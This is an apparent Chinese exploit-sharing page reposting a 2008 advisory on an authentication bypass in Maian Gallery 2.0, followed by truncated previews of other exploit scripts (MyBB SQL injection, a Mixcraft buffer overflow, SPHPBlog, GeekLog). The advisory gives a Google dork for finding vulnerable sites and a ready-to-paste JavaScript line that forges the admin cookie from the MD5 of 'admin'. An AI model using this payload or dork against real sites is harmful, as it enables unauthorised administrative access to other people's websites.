建站极客
网络安全 Exploit 正文
Maian Gallery 2.0 Insecure Cookie Handling Vulnerability
所属分类:
网络安全 / Exploit
阅读数:
98
收藏 0
赞 0
分享
Author: Saime
Date: July 12, 2008
Script: Maian Gallery v2.0 Insecure Cookie Handling Vulnerability
URL: http://www.maianscriptworld.co.uk
Dork: Maian Gallery v2.0 Copyright © 2006-2008 Maian Script World. All Rights Reserved.
Description:
Maian Gallery v2.0 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mgallery_admin_cookie,
equals admin username(md5)
Exploit:
javascript:document.cookie = "mgallery_admin_cookie=21232f297a57a5a743894a0e4a801fc3; path=/php/demos/mgallery/admin/"
Note:
The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin
MyBulletinBoard (MyBB) <?php
// forum mybb <= 1.2.11 remote sql injection vulnerability
// bug found by Janek Vind "waraxe" http://www.waraxe
评论 0
收藏 0
赞 0
分享
Acoustica Mixcraft #!/usr/bin/perl
#
# Acoustica Mixcraft (mx4 file) Local Buffer Overflow Exploit
# Author: Koshi
#
# Date: 08-28-08 ( 0day )
# Ap
评论 0
收藏 0
赞 0
分享
Simple PHP Blog (SPHPBlog) <?
/*
sIMPLE php bLOG 0.5.0 eXPLOIT
bY mAXzA 2008
*/
function curl($url,$postvar){
global $cook;
$ch = cur
评论 0
收藏 0
赞 0
分享
GeekLog #!/usr/bin/perl
use warnings;
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
评论 0
收藏 0
赞 0
分享
NoName Script ################################################################################
[ ] NoName Script 1.1 BETA Multiple Remote Vulnerabiliti
评论 0
收藏 0
赞 0
分享
查看更多